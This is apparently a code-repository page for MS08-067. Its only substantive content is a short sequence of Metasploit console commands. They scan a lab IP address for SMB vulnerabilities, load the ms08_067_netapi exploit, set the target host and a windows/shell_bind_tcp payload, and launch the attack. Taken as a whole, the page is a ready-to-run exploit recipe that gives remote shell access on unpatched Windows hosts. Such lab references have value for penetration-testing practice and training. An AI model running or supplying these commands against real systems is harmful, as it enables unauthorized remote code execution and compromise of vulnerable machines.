Skip to content

Latest commit

 

History

History
 
 

MS08-067

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 
 
 
 
 

MS08-067

MS08-067

Vulnerability reference:

Usage

msf > db_status
msf > db_nmap -sS -sV -O --script=smb-check-vulns.nse -n 192.168.229.137
msf > search ms08_067
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > set RHOST 192.168.229.137
msf  exploit(ms08_067_netapi) > set payload windows/shell_bind_tcp
msf  exploit(ms08_067_netapi) > exploit

References